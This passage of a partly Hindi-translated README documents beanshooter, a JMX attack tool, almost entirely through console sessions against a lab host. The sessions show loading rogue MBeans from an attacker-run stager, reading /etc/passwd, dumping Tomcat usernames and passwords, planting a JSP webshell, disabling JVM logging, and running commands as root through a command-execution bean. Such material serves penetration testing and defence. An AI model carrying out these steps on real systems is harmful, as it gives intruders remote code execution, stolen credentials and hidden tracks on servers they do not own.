[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+] Deplyoing MBean: StandardMBean
[+] MBean with object name de.qtc.beanshooter:standard=4825542879735 was successfully deployed.
[+]
[+] Caught NullPointerException while invoking the newTransformer action.
[+] This is expected bahavior and the attack most likely worked :)
[+]
[+] Removing MBean with ObjectName de.qtc.beanshooter:standard=4825542879735 from the MBeanServer.
[+] MBean was successfully removed.
[qtc@devbox ~]$ beanshooter standard 172.17.0.2 9010 upload index.html::/tmp/index.html
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+] Deplyoing MBean: StandardMBean
[+] MBean with object name de.qtc.beanshooter:standard=4836961801045 was successfully deployed.
[+]
[+] Caught NullPointerException while invoking the newTransformer action.
[+] This is expected bahavior and the attack most likely worked :)
[+]
[+] Removing MBean with ObjectName de.qtc.beanshooter:standard=4836961801045 from the MBeanServer.
[+] MBean was successfully removed.
[qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url file:///tmp/index.html
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: TonkaBean
[+]
[+] MBean class is not known by the server.
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: MLet
[+] MBean with object name DefaultDomain:type=MLet was successfully deployed.
[+]
[+] Loading MBean from file:///tmp/index.html
[+]
[+] MBean with object name MLetTonkaBean:name=TonkaBean,id=1 was successfully deployed.
यदि आप `standard` क्रिया द्वारा कार्यान्वित तकनीक के बारे में अधिक जानना चाहते हैं, तो मैं अत्यधिक इस [ब्लॉग पोस्ट](https://codewhitesec.blogspot.com/2023/03/jmx-exploitation-revisited.html) को [CODE WHITE](https://twitter.com/codewhitesec) द्वारा सुझाता हूँ, जो इसे बहुत विस्तार से समझाता है।
#### हटाना
`undeploy` क्रिया निर्दिष्ट `ObjectName` वाले *MBean* को *JMX* सेवा से हटाती है:```console
[qtc@devbox ~]$ beanshooter undeploy 172.17.0.2 9010 qtc.test:type=Example
[+] Removing MBean with ObjectName qtc.test:type=Example from the MBeanServer.
[+] MBean was successfully removed.
मूल संचालन के विपरीत, जो JMX एंडपॉइंट द्वारा उजागर की गई सामान्य कार्यक्षमता को लक्षित करते हैं, MBean संचालन एक विशिष्ट MBean को लक्षित करते हैं। प्रत्येक समर्थित MBean के लिए, beanshooter एक और उपपार्सर प्रदान करता है जिसमें संबंधित MBean के लिए उपलब्ध संचालन और विकल्प शामिल होते हैं। निम्नलिखित सूची mlet MBean और उससे संबद्ध उपपार्सर का एक उदाहरण दिखाती है:```console
[qtc@devbox ~]$ beanshooter mlet -h
usage: beanshooter mlet [-h] ...
positional arguments:
load load a new MBean from the specified URL
attr set or get MBean attributes
deploy deploys the specified MBean on the JMX server
info print server information about the MBean
invoke invoke the specified method on the MBean
stats print local information about the MBean
status checks whether the MBean is registered
undeploy undeploys the specified MBEAN from the JMX server
named arguments: -h, --help show this help message and exit
### सामान्य MBean संचालन
---
कुछ *beanshooter* संचालन प्रत्येक *MBean* के लिए उपलब्ध हैं और इस अनुभाग में प्रदर्शित किए गए हैं।
ये सामान्य *MBean* संचालन अक्सर [मूल संचालन](#basic-operations) की कार्यक्षमता को प्रतिबिंबित करते हैं,
लेकिन *ObjectName* निर्दिष्ट करने की आवश्यकता के बिना।
#### सामान्य Attr
`attr` क्रिया मूल संचालन के `attr` क्रिया के समान काम करती है। हालांकि, *ObjectName*
को अब निर्दिष्ट करने की आवश्यकता नहीं है, क्योंकि यह निर्दिष्ट *MBean* के भीतर समाहित है।```console
[qtc@devbox ~]$ beanshooter tomcat attr 172.17.0.2 1090 users
Users:type=User,username="manager",database=UserDatabase
Users:type=User,username="admin",database=UserDatabase
Users:type=User,username="status",database=UserDatabase
The deploy action works basically like the deploy action from the basic operations.
However, since the class name, ObjectName and the implementing jar file are all already associated with
the specified MBean, you only need to specify the --stager-url option with this action (assuming that
a builtin jar file is available):```console
[qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: TonkaBean
[+]
[+] MBean class is not known to the server.
[+] Loading MBean from http://172.17.0.1:8000
[+]
[+] Creating HTTP server on: 172.17.0.1:8000
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /440441bf8c794d40a83caf1e34cd9993
[+] Starting HTTP server...
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: 440441bf8c794d40a83caf1e34cd9993
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8000
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /440441bf8c794d40a83caf1e34cd9993
[+] Sending jar file with md5sum: 55a843002e13f763137d115ce4caf705
[+]
[+] MBean with object name MLetTonkaBean:name=TonkaBean,id=1 was successfully deployed
*beanshooter v4.1.0* से, [standard](#standard) क्रिया के माध्यम से *TonkaBean* को तैनात करना भी संभव है।
`standard` क्रिया के माध्यम से बीन तैनाती के लिए लक्ष्य सर्वर से बाहरी नेटवर्क कनेक्शन की **आवश्यकता नहीं** होती है।
#### सामान्य निर्यात
कभी-कभी *beanshooters* स्टेजर सर्वर का उपयोग करके *MBean* कार्यान्वयन प्रदान करना संभव नहीं होता है। एक सामान्य परिदृश्य यह है कि आपकी स्थानीय मशीन से बाहरी कनेक्शन अवरुद्ध होते हैं। ऐसी स्थितियों में, आप *MBean* को किसी अन्य स्थान से लोड करना चाह सकते हैं, जैसे कि आंतरिक नेटवर्क में *SMB* सेवा जहाँ आपके पास लिखने की पहुँच है।
`export` क्रिया निर्दिष्ट *MBean* को लागू करने वाली *jar* फ़ाइल और *MLet* का उपयोग करके *MBean* को लोड करने के लिए आवश्यक एक संगत *MLet HTML* दस्तावेज़ निर्यात करती है। मान लें कि आप *TonkaBean* को `10.10.10.5` पर सुन रहे *SMB* सेवा से प्रस्तुत करना चाहते हैं, तो आप निम्न कमांड का उपयोग कर सकते हैं:```console
[qtc@devbox ~]$ beanshooter tonka export --export-dir export --stager-url file:////10.10.10.5/share/
[+] Exporting MBean jar file: export/tonka-bean-3.0.0-jar-with-dependencies.jar
[+] Exporting MLet HTML file to: export/index.html
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: tonka-bean-3.0.0-jar-with-dependencies.jar
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: file:////10.10.10.5/share/
बाद में, आप निर्यात किए गए jar और index.html फ़ाइल को SMB सेवा पर अपलोड कर सकते हैं और beanshooters की तैनाती क्रिया का उपयोग --stager-url file:////10.10.10.5/share/index.html विकल्प के साथ कर सकते हैं।
info क्रिया निर्दिष्ट MBean की विधि और विशेषता जानकारी सूचीबद्ध करती है:```console
[qtc@devbox ~]$ beanshooter tomcat info 172.17.0.2 1090
[+] MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean
[+] ObjectName: Users:type=UserDatabase,database=UserDatabase
[+]
[+] Attributes:
[+] modelerType (type: java.lang.String , writable: false)
[+] readonly (type: boolean , writable: false)
[+] roles (type: [Ljava.lang.String; , writable: false)
[+] groups (type: [Ljava.lang.String; , writable: false)
[+] users (type: [Ljava.lang.String; , writable: false)
[+] pathname (type: java.lang.String , writable: true)
[+] writable (type: null , writable: false)
[+]
[+] Operations:
[+] java.lang.String findGroup(java.lang.String groupname)
[+] java.lang.String createUser(java.lang.String username, java.lang.String password, java.lang.String fullName)
[+] void removeGroup(java.lang.String groupname)
[+] void removeUser(java.lang.String username)
[+] void save()
[+] java.lang.String findRole(java.lang.String rolename)
[+] void removeRole(java.lang.String rolename)
[+] java.lang.String createGroup(java.lang.String groupname, java.lang.String description)
[+] java.lang.String findUser(java.lang.String username)
[+] java.lang.String createRole(java.lang.String rolename, java.lang.String description)
#### सामान्य Invoke
`invoke` क्रिया का उपयोग निर्दिष्ट *MBean* पर एक मनमाना विधि को आह्वान करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter tomcat invoke 172.17.0.2 1090 --signature 'findUser(String username)' admin
Users:type=User,username="admin",database=UserDatabase
stats क्रिया निर्दिष्ट MBean पर कुछ सामान्य जानकारी सूचीबद्ध करती है। यह वह जानकारी है
जो beanshooters स्थानीय रूप से संबंधित MBean पर संग्रहीत करता है और कोई सर्वर इंटरैक्शन आवश्यक नहीं है।```console
[qtc@devbox ~]$ beanshooter tonka stats
[+] MBean: tonka
[+] Object Name: MLetTonkaBean:name=TonkaBean,id=1
[+] Class Name: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Jar File: available (tonka-bean-3.0.0-jar-with-dependencies.jar)
The `Jar File` जानकारी यह बताती है कि संबंधित *MBean* का कार्यान्वयन *beanshooter* में बिल्ट-इन है या नहीं। यह jar फ़ाइल परिनियोजन के दौरान उपयोग की जाती है, यदि इसे `--jar-file` विकल्प का उपयोग करके ओवरराइट नहीं किया गया हो। वर्तमान में, *TonkaBean* एकमात्र *MBean* है जिसके पास *Jar File* उपलब्ध है।
#### Generic Status
`status` क्रिया जाँच करती है कि संबंधित *MBean* पहले से *JMX* सेवा पर उपलब्ध है या नहीं:```console
[qtc@devbox ~]$ beanshooter tonka status 172.17.0.2 9010
[+] MBean Status: not deployed
अनडिप्लॉय क्रिया निर्दिष्ट MBean को एक रिमोट JMX सेवा से हटाता है:```console [qtc@devbox ~]$ beanshooter tonka undeploy 172.17.0.2 9010 [+] Removing MBean with ObjectName MLetTonkaBean:name=TonkaBean,id=1 from the MBeanServer. [+] MBean was successfully removed.
### Diagnostic
---
The *DiagnosticCommandMBean* एक उपयोगी *MBean* है जो अक्सर *JMX सर्वरों* पर डिफ़ॉल्ट रूप से तैनात किया जाता है।
यह कई अलग-अलग विधियों को लागू करता है जो आक्रामक दृष्टिकोण से दिलचस्प हैं। उनमें से कुछ
*beanshooter* संचालन के रूप में लागू किए गए हैं। अन्य को निश्चित रूप से मैन्युअल रूप से आमंत्रित किया जा सकता है।
#### Diagnostic Read
`read` ऑपरेशन का उपयोग *MBean* सर्वर पर टेक्स्ट फ़ाइलों को पढ़ने के लिए किया जा सकता है। यह ऑपरेशन
निर्दिष्ट टेक्स्ट फ़ाइल की सामग्री वाले अपवाद को उत्पन्न करने के लिए `addCompilerDirective` विधि का उपयोग करता है:```console
[qtc@devbox ~]$ beanshooter diagnostic read 172.17.0.2 1090 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
यह तकनीक मूल रूप से @TheLaluka द्वारा jolokia-exploitation-toolkit के अंतर्गत लागू की गई थी।
load ऑपरेशन का उपयोग JMX सर्वर के फ़ाइल सिस्टम से एक साझा लाइब्रेरी लोड करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter diagnostic load 172.17.0.2 1090 /lib/x86_64-linux-gnu/libc.so.6
[+] The server complained about the missing function Agent_OnAttach
[+] The specified library was loaded succesfully.
#### नैदानिक लॉगफ़ाइल
`logfile` क्रिया का उपयोग *JVM* के लॉगफ़ाइल स्थान को बदलने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter diagnostic logfile 172.17.0.2 1090 /tmp/test.log
[+] Logfile path was successfully set to /tmp/test.log
nolog कार्रवाई का उपयोग लॉगिंग को अक्षम करने के लिए किया जा सकता है (लॉगफ़ाइल हैंडल को बंद करने के लिए उपयोगी):```console
[qtc@devbox ~]$ beanshooter diagnostic nolog 172.17.0.2 1090
[+] Logging was disabled successfully.
#### निदानात्मक cmdline
`cmdline` कार्रवाई उस cmdline को प्रिंट करती है जिसके साथ *JVM* लॉन्च किया गया था:```console
[qtc@devbox ~]$ beanshooter diagnostic cmdline 172.17.0.2 1090
VM Arguments:
jvm_args: --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -Dcatalina.base=/usr/local/tomcat -Dcatalina.home=/usr/local/tomcat -Djava.io.tmpdir=/usr/local/tomcat/temp -Djava.rmi.server.hostname=iinsecure.example -Djavax.net.ssl.keyStorePassword=password -Djavax.net.ssl.keyStore=/opt/store.p12 -Djavax.net.ssl.keyStoreType=pkcs12 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.local.only=false -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.port=1090 -Dcom.sun.management.jmxremote.rmi.port=1099
java_command: org.apache.catalina.startup.Bootstrap start
java_class_path (initial): /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Launcher Type: SUN_STANDARD
props क्रिया सिस्टम प्रॉपर्टीज़ की सूची प्रिंट करती है:```console
[qtc@devbox ~]$ beanshooter diagnostic props 172.17.0.2 1090
#Mon Jul 25 19:17:52 UTC 2022
com.sun.management.jmxremote.rmi.port=1099
awt.toolkit=sun.awt.X11.XToolkit
java.specification.version=11
sun.cpu.isalist=
...
### HotSpot
---
The *HotSpotDiagnosticMXBean* एप्लिकेशन सर्वर पर *HotSpot वर्चुअल मशीन* के प्रबंधन के लिए एक इंटरफ़ेस प्रदान करता है
और कुछ ऐसे तरीकों का समर्थन करता है जो आक्रामक दृष्टिकोण से उपयोगी हैं।
#### HotSpot dump
`dump` क्रिया एक heapdump बनाती है और इसे एप्लिकेशन सर्वर पर किसी भी स्थान पर सहेजती है।
एकमात्र आवश्यकता यह है कि डंप को `.hprof` एक्सटेंशन वाली फ़ाइल के रूप में सहेजा जाए:```console
[qtc@devbox ~]$ beanshooter hotspot dump 172.17.0.2 1090 /tmp/dump.hprof
[+] Heapdump file /tmp/dump.hprof was created successfully.
list क्रिया उपलब्ध Diagnostic Options और उनसे जुड़े मानों की एक सूची प्रदर्शित करती है:```console
[qtc@devbox ~]$ beanshooter hotspot list 172.17.0.2 1090
[+] HeapDumpBeforeFullGC (value = false, writable = true)
[+] HeapDumpAfterFullGC (value = false, writable = true)
[+] HeapDumpOnOutOfMemoryError (value = false, writable = true)
[+] HeapDumpPath (value = , writable = true)
...
#### HotSpot get
`get` क्रिया निर्दिष्ट विकल्प का मान प्राप्त करने की अनुमति देती है:```console
[qtc@devbox ~]$ beanshooter hotspot get 172.17.0.2 1090 HeapDumpBeforeFullGC
[+] Name: HeapDumpBeforeFullGC
[+] Value: false
[+] Writable: true
set क्रिया निर्दिष्ट विकल्प का मान सेट करने की अनुमति देती है:```console
[qtc@devbox ~]$ beanshooter hotspot set 172.17.0.2 1090 HeapDumpBeforeFullGC true
[+] Option was set successfully.
[qtc@devbox ~]$ beanshooter hotspot get 172.17.0.2 1090 HeapDumpBeforeFullGC
[+] Name: HeapDumpBeforeFullGC
[+] Value: true
[+] Writable: true
### MLet
---
*MLetMBean* एक प्रसिद्ध *MBean* है जिसका उपयोग नेटवर्क पर अतिरिक्त *MBeans* लोड करने के लिए किया जा सकता है। इसका उपयोग पहले से ही *beanshooters* के `deploy` क्रिया द्वारा परोक्ष रूप से किया जाता है, लेकिन इसे `mlet` संक्रिया का उपयोग करके मैन्युअल रूप से भी लागू किया जा सकता है।
#### MLet Load
वर्तमान में केवल लागू *MLet* विधि `load` संक्रिया है जिसका उपयोग उपयोगकर्ता द्वारा निर्दिष्ट *URL* से *MBean* वर्ग लोड करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter mlet load 172.17.0.2 9010 tonka http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+] Deplyoing MBean: MLet
[+] MBean with object name DefaultDomain:type=MLet was successfully deployed.
[+]
[+] Loading MBean from http://172.17.0.1:8000
[+]
[+] Creating HTTP server on: 172.17.0.1:8000
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /3584de270132420aaf0812366bc46035
[+] Starting HTTP server...
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: 3584de270132420aaf0812366bc46035
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8000
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /3584de270132420aaf0812366bc46035
[+] Sending jar file with md5sum: b2f7040f7d8f2d1f40b205d631ff7356
[+]
[+] MBean was loaded successfully.
उपरोक्त उदाहरण दिखाता है कि TonkaBean को mlet ऑपरेशन का उपयोग करके मैन्युअल रूप से कैसे लोड किया जा सकता है। यदि आप इसके बजाय एक कस्टम MBean लोड करना चाहते हैं, तो आपको tonka के बजाय कीवर्ड custom निर्दिष्ट करना होगा और --class-name, --object-name और --jar-file विकल्प प्रदान करने होंगे:```console
[qtc@devbox ~]$ beanshooter mlet load 172.17.0.2 9010 custom http://172.17.0.1:8000 --class-name de.qtc.beanshooter.ExampleBean --object-name ExampleBean:name=ExampleBean,id=1 --jar-file www/example.jar
[+] Starting MBean deployment.
[+] ...
[+] MBean was loaded successfully.
### Recoder
---
FlightRecorderMXBean, *Flight Recorder* के प्रबंधन के लिए एक इंटरफ़ेस प्रदान करता है और आक्रामक दृष्टिकोण से कुछ दिलचस्प विधियों का समर्थन करता है।
#### Recoder new
`new` ऑपरेशन एक नई रिकॉर्डिंग शुरू करता है। लौटाई गई रिकॉर्डिंग आईडी का उपयोग अन्य ऑपरेशनों के लिए लक्ष्य के रूप में किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter recorder new 172.17.0.2 1090
[+] Requesting new recording on the MBeanServer.
[+] New recording created successfully with ID: 1
start क्रिया एक मौजूदा रिकॉर्डिंग को प्रारंभ करती है और अतिरिक्त तर्क के रूप में रिकॉर्डिंग आईडी की अपेक्षा करती है:```console
[qtc@devbox ~]$ beanshooter recorder start 172.17.0.2 1090 1
[+] Recording with ID 1 started successfully.
#### Recoder dump
जब एक रिकॉर्डिंग सक्रिय होती है, तो इसकी सामग्री को `dump` क्रिया का उपयोग करके डंप किया जा सकता है। यह रिकॉर्डिंग जानकारी को *JMX सर्वर* पर एक डंप फ़ाइल में संग्रहीत करता है:```console
[qtc@devbox ~]$ beanshooter recorder dump 172.17.0.2 1090 1 /tmp/dump.dat
[+] Recording with ID 1 was successfully dumped to /tmp/dump.dat
stop क्रिया का उपयोग रिकॉर्डिंग को रोकने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter recorder stop 172.17.0.2 1090 1
[+] Recording with ID 1 stopped successfully.
#### Recorder save
एक रिकॉर्डिंग रोक दिए जाने के बाद, इसे `save` क्रिया का उपयोग करके सहेजा जा सकता है। `dump` क्रिया के विपरीत, यह रिकॉर्डिंग को एप्लिकेशन सर्वर के बजाय स्थानीय मशीन पर सहेजता है।```console
[qtc@devbox ~]$ beanshooter recorder save 172.17.0.2 1090 1 recording.dat
[+] Saving recording with ID: 1
[+] Writing recording data to: /home/qtc/recording.dat
tomcat ऑपरेशन Apache Tomcat के MemoryUserDatabaseMBean के साथ इंटरैक्ट करता है। यह MBean एक Tomcat सेवा पर उपलब्ध उपयोगकर्ता खातों तक पहुंच प्रदान करता है।
dump क्रिया Tomcat सर्वर पर उपलब्ध उपयोगकर्ता नाम और पासवर्ड को स्थानीय फ़ाइलों में डंप करती है।
जब एकल तर्क के साथ आह्वान किया जाता है, तो क्रेडेंशियल्स <username>:<password> प्रारूप में डंप किए जाते हैं:```console
[qtc@devbox ~]$ beanshooter tomcat dump 172.17.0.2 1090 creds.txt
[+] Dumping credentials...
[+] Users dumped to /home/qtc/creds.txt
[qtc@devbox ~]$ cat creds.txt
manager:P@55w0rD#
admin:s3cr3T!$
status:[email protected]
जब दो तर्कों के साथ पुकारा जाता है, उपयोगकर्ता नाम पहले निर्दिष्ट स्थान में संग्रहीत होते हैं, पासवर्ड दूसरे में:```console
[qtc@devbox ~]$ beanshooter tomcat dump 172.17.0.2 1090 users.txt passwords.txt
[+] Dumping credentials...
[+] Users dumped to /home/qtc/users.txt
[+] Passwords dumped to /home/qtc/passwords.txt
list ऑपरेशन उपलब्ध उपयोगकर्ता खातों, उनसे संबंधित भूमिकाओं और प्रमाण-पत्रों को सूचीबद्ध करता है:```console
[qtc@devbox ~]$ beanshooter tomcat list 172.17.0.2 1090
[+] Listing tomcat users:
[+]
[+] ----------------------------------------
[+] Username: manager
[+] Password: P@55w0rD#
[+] Roles:
[+] Users:type=Role,rolename="manager-gui",database=UserDatabase
[+] Users:type=Role,rolename="manager-script",database=UserDatabase
[+] Users:type=Role,rolename="manager-jmx",database=UserDatabase
[+] Users:type=Role,rolename="manager-status",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: admin
[+] Password: s3cr3T!$
[+] Roles:
[+] Users:type=Role,rolename="admin-gui",database=UserDatabase
[+] Users:type=Role,rolename="admin-script",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: status
[+] Password: [email protected]
[+] Roles:
[+] Users:type=Role,rolename="manager-status",database=UserDatabase
#### Tomcat Write
The `write` ऑपरेशन एक आंशिक रूप से नियंत्रित फ़ाइल को एप्लिकेशन सर्वर पर किसी मनमानी स्थान पर लिखता है। इस क्रिया का उपयोग *Tomcat* सेवा पर एक webshell को विश्वसनीय रूप से तैनात करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter tomcat write 172.17.0.2 1090 /opt/webshell-cli/webshells/webshell.jsp /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] Writing local file /opt/webshell-cli/webshells/webshell.jsp to server location /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] Current user database is at conf/tomcat-users.xml
[+] Current user database is readonly
[+] Adjusting readonly property to make it writable.
[+] Changing database path to /usr/local/tomcat/webapps/ROOT/shell.jsp
[+] Creating new role containing the local file content.
[+] Saving modified user database.
[+] Restoring readonly property.
[+] Restoring pathname property.
[+] All done.
[qtc@devbox ~]$ webshell-cli http://172.17.0.2:8080/shell.jsp
[root@d475fdb21692 /usr/local/tomcat]$ id
uid=0(root) gid=0(root) groups=0(root)
The write action abuses an encoding bug within the UserDatabase MBean of Apache Tomcat. We reported
the bug, but it was not considered a security vulnerability. For writing to arbitrary locations, beanshooter
needs to change the location of the UserDatabase. All changes are restored, after the desired file was written,
but still be careful in production environments.
The TonkaBean is a custom MBean that is implemented by the beanshooter project and allows
file system access and command execution on the JMX server. Its actions can be accessed by
using the tonka operation, followed by the desired action.
The exec action can be used to invoke a single command on the JMX service:```console
[qtc@devbox ~]$ beanshooter tonka exec 172.17.0.2 9010 id
[+] Invoking the executeCommand method with argument: id
[+] The call was successful
[+]
[+] Server response:
uid=0(root) gid=0(root) groups=0(root)
exec ऑपरेशन का अंतिम तर्क एक स्ट्रिंग होने की अपेक्षा की जाती है। जब `--shell` विकल्प का उपयोग नहीं किया जाता है, तो इस स्ट्रिंग को स्पेस पर विभाजित किया जाता है (कोट्स को ध्यान में रखते हुए) और इसे सर्वर साइड पर `ProcessBuilder` क्लास में एक ऐरे के रूप में पास किया जाता है।
यदि `--shell` का उपयोग किया गया था, तो निर्दिष्ट शेल स्ट्रिंग को स्पेस पर विभाजित किया जाता है और परिणामी ऐरे को निर्दिष्ट तर्क स्ट्रिंग के साथ जोड़ा जाता है, इससे पहले कि इसे `ProcessBuilder` क्लास में पास किया जाए। इससे शेल जैसी निष्पादन की अनुमति मिलती है, जिसमें शेल विशेष वर्णों की सही व्याख्या होती है:```console
[qtc@devbox ~]$ beanshooter tonka exec 172.17.0.2 9010 --shell 'ash -c' 'echo $HOSTNAME'
[+] Invoking the executeCommand method with argument: ash -c echo $HOSTNAME
[+] The call was successful
[+]
[+] Server response:
fee2d783023b
सुविधा के लिए, सामान्य शेल स्वचालित रूप से आवश्यक कमांड स्ट्रिंग आर्गुमेंट के साथ प्रत्ययित होते हैं।
इसलिए, --shell ash स्वचालित रूप से --shell 'ash -c' में परिवर्तित हो जाता है।
execarray ऑपरेशन exec क्रिया के समान है, लेकिन एक स्ट्रिंग को आर्गुमेंट के रूप में अपेक्षित करने और इस स्ट्रिंग को कमांड ऐरे बनाने के लिए स्पेस पर विभाजित करने के बजाय, execarray ऑपरेशन कई आर्गुमेंट्स को निर्दिष्ट करने की अनुमति देता है जो सीधे ProcessBuilder क्लास के लिए कमांड ऐरे के रूप में उपयोग किए जाते हैं:```console
[qtc@devbox ~]$ beanshooter tonka execarray 172.17.0.2 9010 -- ash -c 'echo $HOME'
[+] Invoking the executeCommand method with argument: ash -c echo $HOME
[+] The call was successful
[+]
[+] Server response:
/root
#### Tonka Shell
`shell` क्रिया एक कमांड शेल उत्पन्न करती है जहाँ आप उन कमांड्स को निर्दिष्ट कर सकते हैं जो *JMX* सर्वर पर निष्पादित की जाती हैं। यह शेल पूरी तरह से इंटरैक्टिव नहीं है और केवल *जावा* के `Runtime.exec` मेथड के चारों ओर एक रैपर का प्रतिनिधित्व करता है। हालाँकि, पर्यावरण चर और एक वर्तमान कार्यशील निर्देशिका के लिए बुनियादी समर्थन लागू किया गया है:```console
[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[[email protected] /]$ id
uid=0(root) gid=0(root) groups=0(root)
[[email protected] /]$ cd /home
[[email protected] /home]$ !env test=example
[[email protected] /home]$ echo $test
example
उपरोक्त उदाहरण दर्शाता है कि !env कीवर्ड का उपयोग करके पर्यावरण चर कैसे सेट किए जाते हैं। इस कीवर्ड के अलावा, कई अन्य उपलब्ध हैं:```console
[qtc@devbox ~]$ beanshooter tonka shell 172.17.0.2 9010
[[email protected] /]$ !help
Available shell commands:
execute the specified command
cd
#### Tonka Upload
`upload` क्रिया का उपयोग *JMX* सर्वर पर फ़ाइल अपलोड करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter tonka upload 172.17.0.2 9010 file.dat /tmp
[+] Uploading local file /home/qtc/file.dat to path /tmp on the MBeanSerer.
[+] 33 bytes were written to /tmp/file.dat
download कार्रवाई का उपयोग JMX सर्वर से एक फ़ाइल डाउनलोड करने के लिए किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter tonka download 172.17.0.2 9010 /etc/passwd
[+] Saving remote file /etc/passwd to local path /home/qtc/passwd
[+] 1172 bytes were written to /home/qtc/passwd
### JMXMP
---
JMX सेवाएँ विभिन्न कनेक्टर प्रकारों का उपयोग कर सकती हैं। अब तक सबसे अधिक उपयोग किया जाने वाला कनेक्टर *Java RMI* है, जो *Java RMI* प्रोटोकॉल के आधार पर *JMX* तक पहुँच की अनुमति देता है। एक अन्य लोकप्रिय कनेक्टर *JMX Message Protocol* (*JMXMP*) है, जो पुराना होने के बावजूद, अक्सर सामने आता है। *beanshooter* में अंतर्निहित *JMXMP* समर्थन है और `--jmxmp` विकल्प का उपयोग करते समय *JMXMP* के माध्यम से कनेक्ट करने का प्रयास करता है:```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4444 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+] - Remote JMXMP server does not use SASL.
[+] Login is possible without specifying credentials.
[+] Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - JMXMP serial check is work in progress but endpoints are usually vulnerable.
[+] Configuration Status: Undecided
[+]
[+] Checking available MBeans:
[+]
[+] - 22 MBeans are currently registred on the MBean server.
[+] Found 0 non default MBeans.
प्रमाणित JMXMP एंडपॉइंट्स आमतौर पर SASL का उपयोग करके सुरक्षित किए जाते हैं। SASL सक्षम होने पर, JMX एंडपॉइंट को आमतौर पर क्लाइंट को एक विशिष्ट SASL प्रोफ़ाइल से कनेक्ट करने की आवश्यकता होती है। beanshooter के लिए उपलब्ध प्रोफ़ाइलें हैं:
जब SASL संरक्षित
JMXMP एंडपॉइंट पर enum क्रिया का उपयोग करते हैं, तो beanshooter आवश्यक SASL प्रोफ़ाइल को सूचीबद्ध करने का प्रयास करता है। जबकि आवश्यक SASL
तंत्र का निर्धारण आमतौर पर संभव है, आवश्यक TLS सेटिंग को सूचीबद्ध नहीं किया जा सकता है:```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4449 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+] - Remote JMXMP server uses SASL/NTLM SASL profile.
[+] Notice: TLS setting cannot be enumerated and --ssl may be required.
[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - JMXMP serial check is work in progress but endpoints are usually vulnerable.
[+] Configuration Status: Undecided
### Jolokia समर्थन
---
*v4.0.0* से शुरू करते हुए, *beanshooter* [Jolokia](https://github.com/rhuss/jolokia) आधारित JMX एंडपॉइंट्स का समर्थन करता है।
*Jolokia* आधारित एंडपॉइंट से कनेक्शन स्थापित करने के लिए सामान्य लक्ष्य प्रारूप और `--jolokia` फ्लैग की आवश्यकता होती है:```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 8080 --jolokia --username manager --password admin
[+] Checking specified credentials:
[+]
[+] - Login successful! The specified credentials are correct.
[+] Username: manager - Password: admin
[+]
[+] Checking Jolokia Version:
[+]
[+] - Agent Version 1.7.1 - Protocol Version: 7.2
